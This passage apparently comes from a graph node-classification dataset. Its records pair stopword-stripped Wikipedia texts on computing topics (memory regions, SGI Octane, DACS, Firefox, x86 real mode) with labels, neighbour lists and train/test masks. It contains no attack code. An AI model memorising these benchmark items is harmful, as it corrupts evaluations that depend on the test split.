results 10 times faster four times slower depending region-friendly program compile times however order minutes ml kit eventually scaled large applications two additions scheme separate compilation modules hybrid technique combining region inference tracing garbage collection following development ml kit regions began generalized language environments systems using regions may experience issues regions become large deallocated contain large proportion dead data commonly called leaks even though eventually freed eliminating leaks may involve restructuring program typically introducing new shorter-lifetime regions debugging type problem especially difficult systems using region inference programmer must understand underlying inference algorithm examine verbose intermediate representation diagnose issue tracing garbage collectors effective deallocating type data timely manner without program changes one justification hybrid region/gc systems hand tracing garbage collectors also exhibit subtle leaks references retained data never used region-based memory management works best number regions relatively small contains many objects programs contain many sparse regions exhibit internal fragmentation leading wasted memory time overhead region management presence region inference problem difficult diagnose mentioned rc uses hybrid regions reference counting limiting overhead reference counting since references internal regions n't require counts updated 're modified similarly mark-region hybrid methods combine tracing garbage collection regions function dividing heap regions performing mark-sweep pass regions containing live objects marked freeing unmarked regions require continual defragmentation remain effective",
    "neighbors": [
      2304,
      7808,
      4747,
      5008,
      9490,
      11539,
      541,
      3871,
      1954,
      428,
      814,
      435,
      8502,
      11574,
      3512,
      4668,
      2625,
      1474,
      1736,
      4424,
      6730,
      6221,
      10703,
      5840,
      6228,
      6868,
      86,
      9559,
      5080,
      8539,
      1247,
      865,
      8545,
      8573,
      8421,
      2152,
      7403,
      634,
      2045,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 5075,
    "label": 0,
    "text": "Transana:transana transana software package used analyze digital video audio data transana used gpl licensed software become proprietary software recent releases transana lets user analyze manage data transcribe identify analytically interesting clips assign keywords clips arrange rearrange clips create complex collections interrelated clips explore relationships applied keywords share analysis colleagues goal find new way focus data manage large collections video audio files clips transana product digital insight project developed funding national science foundation national partnership computational infrastructure san diego supercomputer center talkbank project carnegie mellon university",
    "neighbors": [
      7983,
      8554,
      6797,
      6135
    ],
    "mask": "None"
  },
  {
    "node_id": 5076,
    "label": 3,
    "text": "SGI_Octane:sgi octane octane similar octane2 irix workstations marketed sgi two-way multiprocessing-capable workstations originally based mips technologies r10000 microprocessor newer octanes based r12000 r14000 octane2 four improvements compared octane revised power supply system board xbow octane2 also shipped vpro graphics supports vpro cards later revisions octane also included improvements introduced octane2 codenames octane octane2 racer speedracer respectively octane direct successor indigo2 succeeded tezro immediate sibling o2 sgi withdrew octane2 price book may 26 2004 ceased octane2 production june 25 2004 support octane2 ceased june 2009 new system named octane iii introduced early 2010 octane iii intel xeon-based desk-side cluster system confused octane octane2 octane system-board designated ip30 system based sgi xtalk architecture means use system bus instead crossbow application specific integrated circuit asic referred xbow dynamic crossbar switch connects xio ports hub one ports used processor memory subsystem one available pci-x expansion four xio slots packet-based high-bandwidth bus somewhat similar hypertransport makes similar single node origin 200 system xio could bridged pci-x using chip named bridge bridging included system board ioc3 multi-i/o chip two isp1040b scsi controllers rad1 audio menet cards four ioc3s pci cage used pci cards octane octane uses arcs boot firmware like contemporary sgi computer systems processors octane series computers octane series single dual cpu modules second cpu added option replace whole cpu module octane supports 256 mb 8 gb system memory using proprietary 200-pin dimms two system board revisions first revision part number 030-0887-003 supports 2 gb ram second part number 030-1467-001 allows 8 gb memory subsystem vast reserves bandwidth directly served xbow router xio card octane memory controller named heart acts bridge processor memory sdram xio bus graphics octane provided series cards si si+t ssi mxi updated xio versions solid impact si high impact si+t maximum impact mxi sgi indigo2 internally designated sgi 'mardigras boards accelerated reengineered faster geometry engine texture modules create new versions se se+t sse mxe si/se provides 13.5 mb framebuffer memory sse mxe 27 mb framebuffer '+t indicates additional high speed rambus rdram-based texture board gives 4 mb texture memory practically indispensable though quite expensive fragile si/se+t one texture board mxi/mxe 2 texture boards however 2 boards mxi/mxe double available texture memory system doubles texture performance later octanes octane2 support sgi vpro graphics board series designated 'odyssey first vpro series cards v6 v8 main differentiator v6 32 mb ram unlike mardigras option framebuffer memory texture memory come pool v8 128 mb later v10 32 mb v12 128 mb introduced main difference new vpro v10/v12 series double geometry performance older v6/v8 v6 v10 8 mb ram allocated textures 2x textured-enabled mardigras options v8 v12 108 mb ram used textures vpro graphics subsystem consists sgi proprietary chip set associated software chip set consists buzz asic pixel blaster jammer pb j asic associated sdram buzz asic single-chip graphics pipeline operates 251 mhz contains on-chip sram buzz asic three interfaces mardigras boards vpro boards support opengl mardigras opengl 1.1 sgi extensions vpro upgraded support opengl 1.2 opengl arb imaging extensions allowing hardware acceleration numerous imaging operations real-time rates note cards texture memory offer hardware accelerated texturing however add hardware texturing tramless card adding tram modules audio hardware standard even without extensions support low-latency 3 ms input-to-output audio streams alesis adat 8-channel 24-bit optical ports built-in along s/pdif aes/ebu optical coaxial ports makes octane respectable digital audio workstation octane cases large wxhxd 30x40x35 cm heavy 25 kg yet internal 5.25 drive bays external cd-rom drives must connected desired extensions include video i/o audio i/o networking realtime video compression boards external storage options scsi fibre-channel firewire octanes use standard pci cards optional pci cardcage provides 2-full length 1 half-length 5v pci-64 slots pci xio adapter known 'shoehorn provides single 3.3/5v 64-bit pci slot older octanes upgraded vpro graphics however v10 v12 graphics board require xbow revision 1.4 cherokee power supply vpro v6 v8 require xbow revision 1.3 cherokee power supply distinct difference cherokee 747 watt older lucent 623 watt power supplies mounting handle silver cherokee international manufactured power supplies original lucent manufactured ones black handles octane skins come three types original octane green skins original sgi 'cube logo later model octanes skins colour original octane2-style lettering logos octane2 systems blue skins modern lowercase letter-only sgi logo octane series two scsi controllers supports ultra wide scsi devices systems maximum three internal 3.5 scsi sca devices using proprietary mounting sleds also compatible origin 2000 origin 200 onyx2 external ultra wide scsi port used connecting external devices sgi octane impact-class graphics first supported irix version 6.4 vpro-class graphics supported since irix version 6.5.10 v6 v8 v10 v12 graphics supported 6.5.11 6.5.10 special driver patch linux runs octane series although patch experimental impact vpro graphics supported x window system available impactsr series openbsd port runs octane series well",
    "neighbors": [
      5380,
      5898,
      7311,
      5523,
      2452,
      5272,
      6942,
      3764,
      7093,
      823,
      11447,
      7234,
      10051,
      6858,
      9932,
      7001,
      221,
      6243,
      6247,
      5356,
      1398,
      1149
    ],
    "mask": "Test"
  },
  {
    "node_id": 5077,
    "label": 4,
    "text": "Distributed_Access_Control_System:distributed access control system distributed access control system dacs light-weight single sign-on attribute-based access control system web servers server-based software dacs primarily used apache web servers provide enhanced access control web pages cgi programs servlets web-based assets federate apache servers released open-source license dacs provides modular authentication framework supports array common authentication methods rule-based authorization engine grant deny access resources named urls based identity requestor contextual information administrators configure dacs identify users employing authentication methods user accounts already available within organization resulting dacs identities recognized dacs jurisdictions federated addition simple web-based apis command-line interfaces also provided much functionality web-based apis return xml json documents development dacs began 2001 first open source release made available 2005 dacs use following authentication methods account types extensible architecture allows new methods introduced dacs distribution includes various cryptographic functionality message digests hmacs symmetric public key encryption ciphers chacha20 openssl digital signatures password-based key derivation functions hkdf pbkdf2 memory-hard key derivation functions scrypt argon2 much available simple scripting language dacs also act identity provider infocards function relying party although functionality deprecated dacs performs access control evaluating access control rules specified administrator expressed set xml documents rules consulted run-time determine whether access given resource granted denied access control rules arbitrary computations combines attribute-based access control role-based access control policy-based access control delegated access control approaches architecture provides many possibilities administrators",
    "neighbors": [
      5397,
      3629,
      7983,
      2737,
      10801,
      2485,
      823,
      5433,
      4797,
      5573,
      7368,
      10058,
      479,
      2143,
      225,
      865,
      3309,
      6651,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5078,
    "label": 5,
    "text": "Firefox:firefox mozilla firefox simply firefox free open-source web browser developed mozilla foundation subsidiary mozilla corporation firefox officially available windows 7 newer macos linux unofficial ports available various unix unix-like operating systems including freebsd openbsd netbsd illumos solaris unix sibling firefox android also available firefox uses gecko layout engine render web pages implements current anticipated web standards 2017 firefox began incorporating new technology code name quantum promote parallelism intuitive user interface additional version firefox ios released november 12 2015 due platform restrictions uses webkit layout engine instead gecko ios web browsers firefox created 2002 codename phoenix mozilla community members desired standalone browser rather mozilla application suite bundle beta phase firefox proved popular testers praised speed security add-ons compared microsoft then-dominant internet explorer 6 firefox released november 9 2004 challenged internet explorer dominance 60 million downloads within nine months firefox spiritual successor netscape navigator mozilla community created netscape 1998 acquisition aol firefox usage grew peak 32.21 end 2009 version 3.5 overtaking internet explorer 7 although versions internet explorer whole usage declined competition google chrome firefox 9.53 usage share desktop browser according statcounter making second-most popular browser google chrome 71.03 usage share across platforms lower 4.48 third-most popular overall according mozilla december 2014 half billion firefox users around world project began experimental branch mozilla project dave hyatt joe hewitt blake ross believed commercial requirements netscape sponsorship developer-driven feature creep compromised utility mozilla browser combat saw mozilla suite software bloat created stand-alone browser intended replace mozilla suite april 3 2003 mozilla organization announced planned change focus mozilla suite firefox thunderbird community-driven seamonkey formed eventually replaced mozilla application suite 2005 firefox project undergone several name changes nascent browser originally named phoenix mythical bird rose triumphantly ashes dead predecessor case ashes netscape navigator sidelined microsoft internet explorer first browser war phoenix renamed due trademark claim phoenix technologies replacement name firebird provoked intense response firebird database software project mozilla foundation reassured browser would always bear name mozilla firebird avoid confusion pressure mozilla firebird became mozilla firefox february 9 2004 name firefox said derived nickname red panda became mascot newly named project firefox project went many versions version 1.0 released november 9 2004 abbreviation firefox mozilla prefers fx fx though often abbreviated ff 2016 mozilla announced project known quantum sought improve firefox gecko engine components improve firefox performance modernize architecture transition browser multi-process model improvements came wake decreasing market share google chrome well concerns performance lapsing comparison despite improvements changes required existing add-ons firefox made incompatible newer versions favor new extension system designed similar chrome recent browsers firefox 57 released november 2017 first version contain enhancements quantum thus named firefox quantum mozilla executive stated quantum biggest update browser since version 1.0 may 3 2019 expiration intermediate signing certificate caused firefox automatically disable browser extensions add-ons mozilla began roll-out fix shortly thereafter using mozilla studies component features include tabbed browsing spell checking incremental search live bookmarking smart bookmarks download manager private browsing location-aware browsing also known geolocation based google service integrated search system uses google default markets additionally firefox provides environment web developers use built-in tools error console dom inspector extensions firebug recently integration feature pocket firefox hello implementation webrtc added october 2014 allows users firefox compatible systems video call extra feature screen file sharing sending link firefox hello scheduled removed september 2016 functions added add-ons created third-party developers add-ons primarily coded using html javascript api known webextensions designed similar google chrome microsoft edge extension systems firefox previously supported add-ons using xul xpcom apis allowed directly access manipulate much browser internal functionality compatible multi-process architecture xul add-ons deemed legacy add-ons longer supported firefox 57 newer firefox themes added users create download third parties change appearance browser firefox add-on website also gives users ability add applications games ad-blockers screenshot apps many apps firefox implements many web standards including html4 almost full html5 xml xhtml mathml svg 2 partial css extensions ecmascript javascript dom xslt xpath apng animated png images alpha transparency firefox also implements standards proposals created whatwg client-side storage canvas element standards implemented gecko layout engine spidermonkey javascript engine firefox passed acid2 standards-compliance test since version 3.0 mozilla originally stated intend firefox pass acid3 test fully believed svg fonts part test become outdated irrelevant due woff agreed upon standard major browser makers svg font tests removed acid3 test september 2011 firefox 4 greater scored 100/100 firefox also implements safe browsing proprietary protocol google used exchange data related phishing malware protection since version 38 windows vista newer firefox supports playback video content protected html5 encrypted media extensions eme security privacy reasons eme implemented within wrapper open source code allows execution proprietary drm module adobe systems—adobe primetime content decryption module cdm cdm runs within sandbox environment limit access system provide randomized device id prevent services uniquely identifying device tracking purposes drm module downloaded enabled disabled manner plug-ins since version 47 google widevine cdm windows mac os x streaming services like amazon video switch silverlight encrypted html5 video also supported mozilla justified partnership adobe google stating important step mozilla roadmap remove npapi plugin support upon introduction eme support builds firefox windows also introduced exclude support eme free software foundation cory doctorow condemned mozilla decision support eme html5 web standards test firefox 68 scores 513 582 points firefox allowed sandbox security model manage privileges accorded javascript code feature since deprecated limits scripts accessing data websites based same-origin policy also provides support smart cards web applications authentication purposes uses tls protect communications web servers using strong cryptography using https protocol freely available https everywhere add-on enforces https even regular http url entered firefox supports http/2 mozilla foundation offers bug bounty us 3,000 us 7,500 cash reward researchers discover severe security holes firefox official guidelines handling security vulnerabilities discourage early disclosure vulnerabilities give potential attackers advantage creating exploits firefox generally fewer publicly known security vulnerabilities internet explorer see comparison web browsers improved security often cited reason switch internet explorer firefox washington post reported exploit code known critical security vulnerabilities internet explorer available 284 days 2006 comparison exploit code known critical security vulnerabilities firefox available nine days mozilla issued patch remedy problem 2006 symantec study showed although firefox surpassed browsers number vendor-confirmed vulnerabilities year september vulnerabilities patched far quickly found browsers firefox vulnerabilities fixed average one day exploit code made available compared nine days internet explorer symantec later clarified statement saying firefox still fewer security vulnerabilities internet explorer counted security researchers 2010 study national institute standards technology nist based data compiled national vulnerability database nvd firefox listed fifth-most vulnerable desktop software internet explorer eighth google chrome first infoworld cited security experts saying firefox becomes popular vulnerabilities found claim mitchell baker president mozilla foundation denied idea market share alone make vulnerabilities relational said october 2009 microsoft security engineers acknowledged firefox vulnerable security issue found 'windows presentation foundation browser plug-in since february year .net framework 3.5 sp1 windows update silently installed vulnerable plug-in firefox vulnerability since patched microsoft firefox 3.6 known unpatched security vulnerabilities according secunia internet explorer 8 five unpatched security vulnerabilities worst rated less critical secunia mozilla claims patched vulnerabilities mozilla products publicly listed january 28 2013 mozilla recognized trusted internet company privacy 2012 study performed ponemon institute result survey 100,000 consumers united states february 2013 plans announced firefox 22 disable third-party cookies default however introduction feature delayed mozilla developers could collect analyze data effect blocking third-party cookies mozilla also collaborated stanford university cookie clearinghouse project develop blacklist whitelist sites used filter version 23 released august 2013 followed lead competitors blocking iframe stylesheet script resources served non-https servers embedded https pages default additionally javascript could also longer disabled firefox preferences javascript automatically re-enabled users upgraded 23 higher disabled change made due use across majority websites potential repercussions non-experienced users unaware impact along availability extensions noscript disable javascript controlled fashion following release added ability disable javascript developer tools testing purposes january 2015 torrentfreak reported using firefox connected internet using vpn serious security issue due browser support webrtc beginning firefox 44 extensions must signed mozilla used release beta versions firefox firefox 43 blocked unsigned extensions allowed enforcement extension signing disabled extensions must submitted mozilla add-ons subject code analysis order signed although extensions listed service order signed may 2 2019 mozilla announced would strengthening signature enforcement methods included retroactive disabling old extensions deemed insecure firefox update may 3 led bug reports extensions disabled found result overlooked certificate policy change set go effect june 10 firefox versions prior 7.0 information bar appears browser first start asking users whether would like send performance statistics telemetry mozilla enabled default development versions firefox release versions according mozilla privacy policy statistics stored aggregate format personally identifiable information transmitted user ip address november 2018 firefox began using sandbox isolate web tabs rest system lack feature previously earned negative comparisons google chrome microsoft edge since version 60 firefox includes option use dns https doh causes dns lookup requests sent encrypted https protocol use feature user must set certain preferences beginning network.trr trusted recursive resolver network.trr.mode 0 doh disabled 1 activates doh addition unencrypted dns 2 causes doh used unencrypted dns use doh value must 3 setting network.trr.uri url https //mozilla.cloudflare-dns.com/dns-query special cloudflare servers activated mozilla privacy agreement server host restricts collection information incoming dns requests may 21 2019 firefox updated include ability block scripts used computer cpu mine cryptocurrency without user permission firefox version 67.0 update also allowed users block known fingerprinting scripts track activity across web however resist fingerprinting july 2 2019 mozilla introduced mechanism allow firefox automatically trust os-installed certificates prevent tls errors firefox widely localized web browser first official release november 2004 available 24 different languages 28 locales including british english american english european spanish argentine spanish chinese traditional chinese characters simplified chinese characters currently supported versions 68.0.2 68.0.2esr 60.8.0esr available 89 locales 79 languages desktop version firefox available supported microsoft windows macos linux firefox android available android formerly firefox mobile also ran firefox os firefox source code may compiled various operating systems however officially distributed binaries provided following firefox 1.0 released windows 9x well windows nt 4.0 later users reported 1.x builds operable installable windows nt 3.51 september 2013 metro-style version firefox optimized touchscreen use introduced aurora release channel however project since cancelled mozilla citing lack user adoption beta versions version 43.0 included first x64 builds made windows 7 server 2008 r2 version 49.0 dropped support processors without sse2 instruction set windows april 2017 users firefox 52.0.2 windows xp windows vista windows server 2003 windows server 2008 automatic updates enabled migrated firefox 52 esr support projected end operating systems last release june 2018 first official release firefox version 1.0 supported macos called mac os x powerpc architecture mac os x builds ia-32 architecture became available via universal binary debuted firefox 1.5.0.2 2006 starting version 4.0 firefox released x64 architecture macos migrated since inception firefox linux supported 32-bit memory architecture ia-32 instruction set 64-bit builds introduced 4.0 release 46.0 release replaced gtk+ 2.18 3.4 system requirement linux systems running x.org starting 53.0 32-bit builds require sse2 instruction set firefox android codenamed fennec web browser smaller non-pc devices mobile phones pdas originally first released nokia maemo operating system specifically nokia n900 january 28 2010 march 29 2011 besides maemo version 4 added android release mobile version browser version number bumped 2 4 synchronizing future desktop releases firefox rendering engines used browsers version 7 last release maemo n900 user interface completely redesigned optimized small screens controls hidden away web content shown screen uses touchscreen interaction methods includes awesome bar tabbed browsing add-on support password manager location-aware browsing ability synchronize user computer firefox browser using firefox sync april 2013 then-mozilla ceo gary kovacs said firefox would come ios long apple required use webkit layout engine one reason given mozilla prior ios 8 apple supplied third-party browsers inferior version javascript engine hobbled performance making impossible match safari javascript performance ios platform apple later opened nitro javascript engine third-party browsers 2015 mozilla announced moving forward firefox ios preview release made available new zealand september year november 2016 firefox released new ios app titled firefox focus private web browser firefox also ported freebsd netbsd openbsd openindiana os/2 skyos beos/haiku unofficial rebranded version called timberwolf available amigaos 4 unofficial continuation mac os x powerpc release continues tenfourfox firefox port openbsd maintained landry breuil since 2010 firefox regularly built current branch operating system latest versions packaged release remain frozen next release 2017 landry began hosting packages newer firefox versions openbsd releases 6.0 onwards making available installations without ports system solaris port firefox including opensolaris maintained oracle solaris desktop beijing team march 2017 team disbanded also unofficial port firefox 3.6.x ibm aix v1.7.x unixware besides official releases mozilla provides development builds firefox distribution channels named order least stable beta developer edition former aurora renamed november 10 2014 nightly starting firefox 54 developer edition based beta build firefox esr version firefox organizations groups need extended support mass deployments esr release based regular version released time supported approximately one year unlike regular rapid releases esrs updated new features performance enhancements every six weeks rather updated high-risk-reduction high-impact security fixes major stability fixes point releases end esr cycle firefox source code free software released mozilla public license mpl version 2.0 license permits anyone view modify redistribute source code result several publicly released applications built netscape flock miro gnu icecat iceweasel songbird pale moon comodo icedragon past firefox licensed solely mpl version 1.1 free software foundation criticized weak copyleft license permitted limited ways proprietary derivative works additionally code licensed mpl 1.1 could legally linked code gpl address concerns mozilla re-licensed firefox tri-license scheme mpl 1.1 gpl 2.0 lgpl 2.1 since re-licensing developers free choose license received code suit intended use gpl lgpl linking derivative works one licenses chosen mpl use including possibility proprietary derivative works chose mpl however january 3 2012 mozilla released gpl-compatible mpl 2.0 release firefox 13 june 5 2012 mozilla used replace tri-licensing scheme crash reporting service initially closed-source switched version 3 program called talkback open-source breakpad socorro server name mozilla firefox registered trademark along official firefox logo may used certain terms conditions anyone may redistribute official binaries unmodified form use firefox name branding distribution restrictions placed distributions modify underlying source code name firefox derives nickname red panda mozilla placed firefox logo files open-source licenses trademark guidelines allow displaying altered similar logos contexts trademark law applies controversy mozilla foundation intentions stopping certain open source distributions using firefox trademark open source browsers enable greater choice innovation market rather aiming mass-market domination mozilla foundation chairperson mitchell baker explained interview 2007 distributions could freely use firefox trademark modify source-code mozilla foundation concern users getting consistent experience used firefox allow distributions code without using official branding firefox build system contains branding switch switch often used alphas auroras future firefox versions allows code compiled without official logo name allow derivative work unencumbered restrictions firefox trademark produced unbranded build trademarked logo name replaced freely distributable generic globe logo name release series modified version derived distributing modified versions firefox firefox name required explicit approval mozilla changes made underlying code required use official branding example permissible use name firefox without also using official logo debian project decided stop using official firefox logo 2006 mozilla copyright restrictions time incompatible debian guidelines told representative mozilla foundation acceptable asked either comply published trademark guidelines cease using firefox name distribution ultimately debian switched branding modified version firefox iceweasel 2016 switched back firefox along mozilla software gnu icecat another derived version firefox distributed gnu project maintains separate branding early firebird phoenix releases firefox considered reasonable visual designs fell short compared many professional software packages october 2003 professional interface designer steven garrity wrote article covering everything considered wrong mozilla visual identity shortly afterwards mozilla foundation invited garrity head new visual identity team release firefox 0.8 february 2004 saw introduction new branding efforts included new icon designs silverorange group web developers long-standing relationship mozilla final renderings jon hicks worked camino logo later revised updated fixing several flaws found enlarged animal shown logo stylized fox although firefox usually common name red panda panda according hicks n't really conjure right imagery widely known firefox icon trademark used designate official mozilla build firefox software builds official distribution partners reason software distributors distribute modified versions firefox use icon june 2019 firefox announced rebranding introduced new logo new logo meant encompass larger family products firefox adopted rapidly 100 million downloads first year availability followed series aggressive marketing campaigns starting 2004 series events blake ross asa dotzler called marketing weeks firefox continued heavily market releasing marketing portal dubbed spread firefox sfx september 12 2004 debuted along firefox preview release creating centralized space discussion various marketing techniques release manifesto stated mozilla project global community people believe openness innovation opportunity key continued health internet two-page ad edition december 16 new york times placed mozilla foundation coordination spread firefox featured names thousands people worldwide contributed mozilla foundation fundraising campaign support launch firefox 1.0 web browser sfx portal enhanced get firefox button program giving users referrer points incentive site lists top 250 referrers time time sfx team sfx members launch marketing events organized spread firefox website part spread firefox campaign attempt break world download record release firefox 3 resulted official certified guinness world record eight million downloads february 2011 mozilla announced would retiring spread firefox sfx three months later may 2011 mozilla officially closed spread firefox mozilla wrote currently plans create new iteration website spread firefox later date celebration third anniversary founding mozilla foundation world firefox day campaign established july 15 2006 ran september 15 2006 participants registered friend website nomination names displayed firefox friends wall digital wall displayed headquarters mozilla foundation firefox community also engaged promotion web browser 2006 firefox contributors oregon state university made crop circle firefox logo oat field near amity oregon near intersection lafayette highway walnut hill road firefox reached 500 million downloads february 21 2008 firefox community celebrated visiting freerice earn 500 million grains rice initiatives included live chat service mozilla launched 2007 allowed users seek technical support volunteers service later retired promote launch firefox quantum november 2017 mozilla partnered reggie watts produce series tv ads social media content december 2005 internet week ran article many readers reported high memory usage firefox 1.5 mozilla developers said higher memory use firefox 1.5 least partially due new fast backwards-and-forwards fastback feature known causes memory problems malfunctioning extensions google toolbar older versions adblock plug-ins older versions adobe acrobat reader pc magazine 2006 compared memory usage firefox 2 opera 9 internet explorer 7 found firefox used approximately much memory two browsers softpedia noted firefox 1.5 took longer start browsers confirmed speed tests ie 6 launched swiftly firefox 1.5 windows xp since many components built os loaded system startup workaround issue preloader application created loaded components firefox startup similar internet explorer windows vista feature called superfetch performs similar task preloading firefox used often enough tests performed pc world zimbra 2006 indicated firefox 2 used less memory internet explorer 7 firefox 3 used less memory internet explorer 7 opera 9.50 beta safari 3.1 beta firefox 2 tests performed mozilla cybernet browser world mid-2009 betanews benchmarked firefox 3.5 declared performed nearly ten times better xp microsoft internet explorer 7 january 2010 lifehacker compared performance firefox 3.5 firefox 3.6 google chrome 4 stable dev versions safari 4 opera 10.1 stable 10.5 pre-alpha versions lifehacker timed long browsers took start reach page right boot-up running least already timed long browsers took load nine tabs tested javascript speeds using mozilla dromaeo online suite implements apple sunspider google v8 tests measured memory usage using windows 7 process manager concluded firefox 3.5 3.6 fifth- sixth-fastest browsers respectively startup 3.5 third- 3.6 sixth-fastest load nine tabs 3.5 sixth- 3.6 fifth-fastest javascript tests also concluded firefox 3.6 efficient memory usage followed firefox 3.5 february 2012 tom hardware performance tested chrome 17 firefox 10 internet explorer 9 opera 11.61 safari 5.1.2 windows 7 tom hardware summarized tests four categories performance efficiency reliability conformance performance category tested html5 java javascript dom css 3 flash silverlight webgl webgl 2 current version 51 java silverlight stop working version 52 —they also tested start time page load time performance tests showed firefox either acceptable strong categories winning three categories html5 html5 hardware acceleration java finishing weak css performance efficiency tests tom hardware tested memory usage management category determined firefox acceptable performing light memory usage strong performing heavy memory usage reliability category firefox performed strong amount proper page loads final category conformance determined firefox strong conformance javascript html5 conclusion tom hardware determined firefox best browser windows 7 os narrowly beat google chrome june 2013 tom hardware performance tested firefox 22 chrome 27 opera 12 internet explorer 10 found firefox slightly edged browsers performance index examined wait times javascript execution speed html5/css3 rendering hardware acceleration performance firefox also scored highest non-performance index measured memory efficiency reliability security standards conformance finishing substantially ahead chrome runner-up tom hardware concluded declaring firefox sound winner performance benchmarks january 2014 benchmark testing memory usage firefox 29 google chrome 34 internet explorer 11 indicated firefox used least memory substantial number tabs open benchmark testing early 2015 high-end windows machine comparing microsoft edge internet explorer firefox chrome opera firefox achieved highest score three seven tests four different javascript performance tests gave conflicting results firefox bested others peacekeeper benchmark behind microsoft products tested sunspider measured mozilla kraken came second place chrome google octane challenge took third behind chrome opera firefox took lead webxprt runs several typical html5 javascript tasks firefox chrome opera achieved highest possible score oort online test measuring webgl rendering speed webgl 2 current terms html5 compatibility testing firefox ranked middle group similar set benchmark tests 2016 showed firefox javascript performance kraken newer jetstream tests trailing slightly behind tested browsers except internet explorer performed relatively poorly octane firefox came ahead ie safari slightly behind rest including vivaldi microsoft edge edge took overall first place jetstream octane benchmarks adoption firefox 57 mozilla quantum project entering production browsers november 2017 firefox tested faster chrome independent javascript tests demonstrated use less memory many browser tabs opened techradar rated fastest web browser may 2019 report downloads continued increasing rate since firefox 1.0 released november 9 2004 firefox already downloaded one billion times number include downloads using software updates third-party websites represent user count one download may installed many machines one person may download software multiple times software may obtained third-party july 2010 ibm asked employees 400,000 use firefox default browser firefox second-most used web browser november 2011 google chrome surpassed according mozilla firefox 450 million users firefox second-most widely used desktop browser position makes fourth-most popular approximately 11.78 worldwide usage share web browsers across platforms according firefox public data report mozilla active monthly count desktop clients decreased around 310 million 2017 260 million 2019",
    "neighbors": [
      513,
      2050,
      6657,
      5636,
      7683,
      9736,
      10253,
      6158,
      9745,
      2579,
      3603,
      4117,
      3097,
      9241,
      6171,
      2076,
      4637,
      1054,
      543,
      7708,
      7713,
      3618,
      8227,
      9757,
      3110,
      6694,
      9768,
      3625,
      9770,
      10791,
      7212,
      559,
      3634,
      8754,
      4661,
      3638,
      3639,
      10808,
      11319,
      9786,
      3643,
      2108,
      9275,
      575,
      64,
      6209,
      9281,
      7951,
      3657,
      4171,
      5707,
      5199,
      10831,
      11345,
      10834,
      5205,
      6231,
      8281,
      2139,
      6747,
      6237,
      8285,
      6241,
      11363,
      2149,
      3685,
      4198,
      1129,
      1642,
      3690,
      9834,
      10860,
      1134,
      9839,
      9841,
      4722,
      115,
      9843,
      3191,
      119,
      2169,
      4728,
      3707,
      637,
      1664,
      641,
      5251,
      2182,
      6791,
      6285,
      6797,
      10388,
      8854,
      8857,
      11418,
      10910,
      6815,
      3744,
      8351,
      8358,
      7340,
      9389,
      2734,
      3759,
      7854,
      1713,
      3250,
      9394,
      9908,
      7861,
      185,
      11449,
      6143,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      7889,
      5844,
      4310,
      4822,
      2777,
      4314,
      8923,
      11481,
      735,
      2784,
      737,
      5343,
      11487,
      3300,
      4326,
      7913,
      4331,
      4844,
      5356,
      9451,
      9964,
      1776,
      7920,
      11506,
      11509,
      8699,
      4344,
      11000,
      2298,
      3323,
      8443,
      8956,
      8957,
      10497,
      9987,
      5380,
      7943,
      1295,
      1807,
      6927,
      2322,
      7439,
      2836,
      5397,
      278,
      1302,
      1304,
      3350,
      7953,
      9215,
      10006,
      7965,
      10009,
      10522,
      10741,
      11547,
      7459,
      11045,
      11559,
      2345,
      1834,
      5935,
      7983,
      11569,
      11060,
      823,
      4920,
      2875,
      7488,
      1347,
      9541,
      2886,
      2887,
      10057,
      11082,
      10060,
      2893,
      6477,
      2383,
      3409,
      339,
      10078,
      9569,
      3941,
      9064,
      11112,
      9579,
      4972,
      6508,
      8557,
      1393,
      5492,
      8054,
      7543,
      9591,
      3961,
      378,
      10102,
      10614,
      6528,
      2945,
      3969,
      3971,
      7044,
      3462,
      8584,
      4490,
      9610,
      6028,
      8588,
      10126,
      11659,
      5522,
      6035,
      7572,
      1429,
      6550,
      8084,
      10133,
      3485,
      2462,
      3487,
      1952,
      5536,
      5026,
      6049,
      9121,
      11680,
      11683,
      5543,
      7595,
      4013,
      8621,
      11693,
      944,
      1968,
      7601,
      8627,
      9138,
      2485,
      7101,
      5054,
      9152,
      6086,
      10185,
      4048,
      8147,
      2005,
      5078,
      3032,
      10713,
      5082,
      479,
      482,
      10722,
      5605,
      487,
      488,
      8169,
      4074,
      4075,
      5612,
      10219,
      494,
      1520,
      7152,
      9712,
      3573,
      502,
      1526,
      5109,
      5622,
      5114,
      6133,
      8700,
      2045,
      2046,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 5079,
    "label": 9,
    "text": "Albatross_(programming_language):albatross programming language albatross general purpose programming language verified statically",
    "neighbors": [
      9345,
      8262,
      11625,
      5612,
      7983,
      4791,
      8924
    ],
    "mask": "Test"
  },
  {
    "node_id": 5080,
    "label": 9,
    "text": "Real_mode:real mode real mode also called real address mode operating mode x86-compatible cpus real mode characterized 20-bit segmented memory address space giving exactly 1 mib addressable memory unlimited direct software access addressable memory i/o addresses peripheral hardware real mode provides support memory protection multitasking code privilege levels release 80286 introduced protected mode real mode available mode x86 cpus backward compatibility x86 cpus start real mode reset though possible emulate real mode systems starting modes 286 architecture introduced protected mode allowing among things hardware-level memory protection using new features however required new operating system specifically designed protected mode since primary design specification x86 microprocessors fully backward compatible software written x86 chips 286 chip made start 'real mode – mode turned new memory protection features could run operating systems written 8086 8088 2018 current x86 cpus including x86-64 cpus able boot real mode operating systems run software written almost previous x86 chip without emulation virtualization pc bios ibm introduced operates real mode dos operating systems ms-dos dr-dos etc. early versions microsoft windows ran real mode windows/386 made possible make use protected mode fully realized windows 3.0 could run either real mode make use protected mode manner windows/386 windows 3.0 actually several modes real mode standard mode 386-enhanced mode latter required virtualization features 80386 processor thus would run 80286 windows 3.1 removed support real mode first mainstream operating environment required least 80286 processor windows 95 architecture evolution windows workgroups 386 enhanced mode none versions could considered modern x86 operating system since switched protected mode certain functions unix linux os/2 windows nt 3.x later etc considered modern os switch cpu protected mode startup never return real mode provide benefits protected mode time 64-bit operating systems use another stepping stone get long mode worth noting protected mode 80286 considerably primitive improved protected mode introduced 80386 latter sometimes called 386 protected mode mode modern 32-bit x86 operating systems run 8086 8088 80186 20-bit address bus unusual segmented addressing scheme intel chose processors actually produces effective addresses 21 significant bits scheme shifts 16-bit segment number left four bits making 20-bit number four least-significant zeros adding 16-bit address offset maximum sum occurs segment offset 0xffff yielding 0xffff0 0xffff 0x10ffef 8086 8088 80186 result effective address overflows 20 bits address wraps around zero end address range i.e taken modulo 